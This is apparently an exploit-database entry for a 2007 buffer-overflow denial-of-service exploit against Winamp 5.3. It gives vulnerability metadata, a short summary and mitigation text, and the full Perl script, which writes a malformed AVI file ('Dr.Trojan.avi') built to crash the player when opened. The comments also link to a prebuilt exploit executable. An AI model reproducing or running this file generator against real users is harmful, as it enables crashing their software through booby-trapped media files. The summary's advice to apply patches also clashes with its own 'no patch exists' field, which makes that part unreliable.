header-logo
Suggest Exploit
vendor:
Winamp Media Player
by:
DeltahackingTEAM
7.5
CVSS
HIGH
Buffer Overflow
CWE
Product Name: Winamp Media Player
Affected Version From: 5.3
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:winamp:winamp:5.3
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Winamp Buffer Overflow DOS Exploit (0-DAY)

This is a buffer overflow exploit for Winamp Media Player. The exploit is in the form of an executable file (winamp.exe) and a Perl script (winamp.pl). The exploit takes advantage of a buffer overflow vulnerability in Winamp to cause a denial-of-service (DOS) attack. The exploit creates a malicious AVI file (Dr.Trojan.avi) that triggers the buffer overflow when opened in Winamp. The exploit was discovered by the DeltahackingTEAM and the bug was found and exploited by Farzad.Sharifi (Dr.Trojan). The risk level of this vulnerability is high.

Mitigation:

To mitigate this vulnerability, users should update to the latest version of Winamp or apply any available patches or security updates. It is also recommended to exercise caution when opening files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Winamp Buffer Overflow DOS Exploit (0-DAY)

# Testet:Ver 5.3

# Discoverd By = DeltahackingTEAM    Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan)

# Risk = High

#Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe  

#Exploit(PL)  =http://www.deltahacking.net/exp/winamp.pl

#OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi

# Winamp Media Player Download=>http://www.winamp.com/


{

    print "\n================================================================================\n";

    print "\                                DeltahackingTEAM \n";

    print "\                            Delta.Secure[A]Gmail.com\n";

    print "\                      Winamp Buffer Overflow DOS Exploit \n";

    print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n";
   
    print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n ";

    print "\    n-------------------Exploit Completed(File Create)!-------------------\n";

    print "\n================================================================================\n";

}

open(avi, ">./Dr.Trojan.avi");

print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";


print avi "\x4D\x54\x68\x64";


print avi "\x4D\x54\x68\x64";



print avi "\x4D\x54\x68\x64";

#0nLy Iran :X
#Farzad.Sharifi  

# milw0rm.com [2007-04-23]